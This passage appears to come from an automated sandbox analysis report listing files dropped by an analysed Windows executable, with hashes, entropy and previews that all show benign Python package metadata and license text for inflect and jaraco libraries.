                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21079
                                                                                                                                                                                                                              Entropy (8bit):5.103530371859935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:12Vpnu38/2K9tjUaNtT/yTCtYTnWDdg3GaXb51KLVgWTVPeEGsuPrAESM:12Vpnu38JZtT/yIdg3D51KLV7RPeEGs+
                                                                                                                                                                                                                              MD5:1A287FAF08B125BC7C932AAD05E7DAEE
                                                                                                                                                                                                                              SHA1:C37042ADC0D1270485F4B8B5B9E085A274DC035B
                                                                                                                                                                                                                              SHA-256:66030D634580651B3E53CC19895D9231F8D22AA06B327817C8332CFC20303308
                                                                                                                                                                                                                              SHA-512:D0BB0AD27A17007DF7D3281FB2F46EFB048B69532D082AB1D431E0BA28E592D897687708B4EC972F4BC21EDA29DDDDC9EF44BB950DFC4FFB03EA75CDA4DE414C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: inflect.Version: 7.3.1.Summary: Correctly generate plurals, singular nouns, ordinals, indefinite articles.Author-email: Paul Dyson <pwdyson@yahoo.com>.Maintainer-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/inflect.Keywords: plural,inflect,participle.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Natural Language :: English.Classifier: Operating System :: OS Independent.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: Text Processing :: Linguistic.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools >=8.5.0.Requires-Dist: typeguard >=4.0.1.Requires-Dist: typing-extensions ; python_version < "3.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943
                                                                                                                                                                                                                              Entropy (8bit):5.828988691860191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:IVn/2zDPvbqfuIpBntmuIcjlM+sVGXdbkDcnJopDvDK16bZWJV:unuXPzUuIpRtmuZjl9sVQgcnJo9bK16E
                                                                                                                                                                                                                              MD5:C837BB3258448B7FCC6B77559C7F17B6
                                                                                                                                                                                                                              SHA1:B15701449CD64A13756A70AD3704E26DB1FF416B
                                                                                                                                                                                                                              SHA-256:5D7834AC1BA2612C6801050FDE57A7B98B0F36ACF88C3C2D4F376FD8911B3091
                                                                                                                                                                                                                              SHA-512:2333CD86502C51607414390ECF43BD6D62E863D3DFB0501DAD3A8B45F5F4DFA81F910917183FC4F4A0DEEC82C8F8B3CF8D5B0A2C136DEB164226BABE68B74A33
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:inflect-7.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..inflect-7.3.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..inflect-7.3.1.dist-info/METADATA,sha256=ZgMNY0WAZRs-U8wZiV2SMfjSKqBrMngXyDMs_CAwMwg,21079..inflect-7.3.1.dist-info/RECORD,,..inflect-7.3.1.dist-info/WHEEL,sha256=y4mX-SOX4fYIkonsAGA5N0Oy-8_gI4FXw5HNI1xqvWg,91..inflect-7.3.1.dist-info/top_level.txt,sha256=m52ujdp10CqT6jh1XQxZT6kEntcnv-7Tl7UiGNTzWZA,8..inflect/__init__.py,sha256=Jxy1HJXZiZ85kHeLAhkmvz6EMTdFqBe-duvt34R6IOc,103796..inflect/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..inflect/compat/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__pycache__/py38.cpython-312.pyc,,..inflect/compat/py38.py,sha256=oObVfVnWX9_OpnOuEJn1mFbJxVhwyR5epbiTNXDDaso,160..inflect/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAVLKSgP+tPCCfA5S:RtC1VLKZWBBf
                                                                                                                                                                                                                              MD5:EB46A94D39AC40E2EEA4A32729E0C8C3
                                                                                                                                                                                                                              SHA1:E42EF49A7098269E1934932ECC3174B40967982A
                                                                                                                                                                                                                              SHA-256:CB8997F92397E1F6089289EC0060393743B2FBCFE0238157C391CD235C6ABD68
                                                                                                                                                                                                                              SHA-512:D89F0DA16AA37AAFAC0DE56A3DFBD72DC3C9DCC53C8E455094E7230DB21ABF95ED76EAC1848A4156DB422B9C10BE136201D871DCCB73AD38192E5536E41DBDFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (70.2.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8
                                                                                                                                                                                                                              Entropy (8bit):3.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:KDpJ:K9J
                                                                                                                                                                                                                              MD5:4571281D24750CBE7638EFE250E342AB
                                                                                                                                                                                                                              SHA1:61E8A0AD5796F1CA67EAB0D8108A6402483D499B
                                                                                                                                                                                                                              SHA-256:9B9DAE8DDA75D02A93EA38755D0C594FA9049ED727BFEED397B52218D4F35990
                                                                                                                                                                                                                              SHA-512:E7807002E53CC228D6EFB307E928C6737796B29E31D25A342ED407F556FFBF540494FE92C27B5C31043D2D7FF427C78A29C4FF5595BC11BB643003026642254E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:inflect.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3933
                                                                                                                                                                                                                              Entropy (8bit):4.993707893382395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D0duaC9zmnEh2S8xI0+4np+A+fbl7inVgQJSwT2:qq9KnEh2zxI0+4npn+zlmn+QJSwT2
                                                                                                                                                                                                                              MD5:C9BA49C9B82CEFCCAC79CB5B76BCB1EE
                                                                                                                                                                                                                              SHA1:AC0DB25AEFD2679B4C3265E713D00F6155A94465
                                                                                                                                                                                                                              SHA-256:20C51A96236C0395F53B1F4C5D458E6A0721E51E16C1BFF733B7ABA76F5D06D8
                                                                                                                                                                                                                              SHA-512:563C3BEC6FB8D137357130BADCB63A229A18A781B05E2F006F4A42AF7C9052D23D266908DA2E62FF283C9BA7BAA9B6CB6FB32A1999CB07F63471CA43003A34C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.collections.Version: 5.1.0.Summary: Collection objects similar to those in stdlib by jaraco.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/jaraco.collections.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.text.Provides-Extra: check.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'check'.Requires-Dist: pytest-ruff >=0.2.1 ; (sys_platform != "cygwin") and extra == 'check'.Provides-Extra: cover.Requires-Dist: pytest-cov ; extra == 'cover'.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):873
                                                                                                                                                                                                                              Entropy (8bit):5.770829319764291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:T9bn/2zDabvbqfunb1AO5bGYbEsJvbp1blKzmKmJaaX9WJV:T9bnuXabzUunb1AgbBb5Jvbp1blscWJV
                                                                                                                                                                                                                              MD5:0463062305AC30E7F3D6AB12DA825D90
                                                                                                                                                                                                                              SHA1:AC83602461BF535C78EB4CCC13AB103C12110D57
                                                                                                                                                                                                                              SHA-256:1E9B62BD70E4A5FA26E9594CBB80860FFECA3DEBFEE8773DAEFA774CD259CA06
                                                                                                                                                                                                                              SHA-512:8F617D9A2DA41BDC8591D9EA9F2DBE79D7C5816BA7A94D4044AFF2A0504C9738E83FFCAA350CEF20764D430C261C9DC17DBB5E4ABB7AE54C3BE8715C8AD6BB71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.collections-5.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.collections-5.1.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.collections-5.1.0.dist-info/METADATA,sha256=IMUaliNsA5X1Ox9MXUWOagch5R4Wwb_3M7erp29dBtg,3933..jaraco.collections-5.1.0.dist-info/RECORD,,..jaraco.collections-5.1.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.collections-5.1.0.dist-info/WHEEL,sha256=Mdi9PDNwEZptOjTlUcAth7XJDFtKrHYaQMPulZeBCiQ,91..jaraco.collections-5.1.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/collections/__init__.py,sha256=Pc1-SqjWm81ad1P0-GttpkwO_LWlnaY6gUq8gcKh2v0,26640..jaraco/collections/__pycache__/__init__.cpython-312.pyc,,..jaraco/collections/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.696166043246402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAWWHKRRP+tPCCfA5S:RtC1qjWBBf
                                                                                                                                                                                                                              MD5:6FBE8610D7E48CA32AE774804C4A0B19
                                                                                                                                                                                                                              SHA1:102D23C4ECB17ED83A6E43888B45FF2BBFE93E0B
                                                                                                                                                                                                                              SHA-256:31D8BD3C3370119A6D3A34E551C02D87B5C90C5B4AAC761A40C3EE9597810A24
                                                                                                                                                                                                                              SHA-512:78738099EC5B31FDEE5AE50F7840F17EFD526588835157CADF4249882462B1AF2E3BEDB77801A9FCB1D22A8FD41AA6A934B382F3E66309723D0E7F93C2F2868A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (73.0.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4020
                                                                                                                                                                                                                              Entropy (8bit):4.99859161164956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D6P4YaCP1gGRbHneRohWYc+f/PCnG9rulJQ84UNxCUSwTcL:kPqGRbHneRohWJ+XPaqylW/USwTcL
                                                                                                                                                                                                                              MD5:812F27A7C8C748351DC1643D58B6B250
                                                                                                                                                                                                                              SHA1:AC9C92013B2F0FC65D741B32A9FE4B956DD6EB7D
                                                                                                                                                                                                                              SHA-256:C43B60B897A3D2D37D8845C252FC44261D9AEF171E21154111A9012D2AFFFED6
                                                                                                                                                                                                                              SHA-512:CAC62C3682F808D85233B69F1C142B5A0E95E316E4BDCBC6EE253583EC302FA42E635BAB6A837327D8CE5D26C08C8DCD9E45D5CFDD8346B4501C473250D66953
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.context.Version: 5.3.0.Summary: Useful decorators and context managers.Home-page: https://github.com/jaraco/jaraco.context.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: backports.tarfile ; python_version < "3.12".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.1,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):641
                                                                                                                                                                                                                              Entropy (8bit):5.76835538630355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TGA0a/2zDJAv/TnqfQlWJAL/fy9vKAGvAXCaaryBAl2VrkEQCXvbAT2r1S:TBn/2zDCvbqfuLO9FGoXamalKSCXzB1S
                                                                                                                                                                                                                              MD5:2B0A77624AE3903E42C3A8213E593796
                                                                                                                                                                                                                              SHA1:D63027FF018995D0620E2497BCE9678888A57667
                                                                                                                                                                                                                              SHA-256:55197B88A78443297BB2D827A75BAAE740B33896251D872835D4B4C75EC2F57E
                                                                                                                                                                                                                              SHA-512:C02FB1554F8F40158BB60F2B4EC07D80F71CFBFFB38463C5809385A7A2FF8DDB2BDFEFE9AE5E67F4DEC3D904A6E0925E565B0EE6363DD0C2ED5B03A96B056B18
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.context-5.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.context-5.3.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.context-5.3.0.dist-info/METADATA,sha256=xDtguJej0tN9iEXCUvxEJh2a7xceIRVBEakBLSr__tY,4020..jaraco.context-5.3.0.dist-info/RECORD,,..jaraco.context-5.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.context-5.3.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/__pycache__/context.cpython-312.pyc,,..jaraco/context.py,sha256=REoLIxDkO5MfEYowt_WoupNCRoxBS5v7YX2PbW8lIcs,9552..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
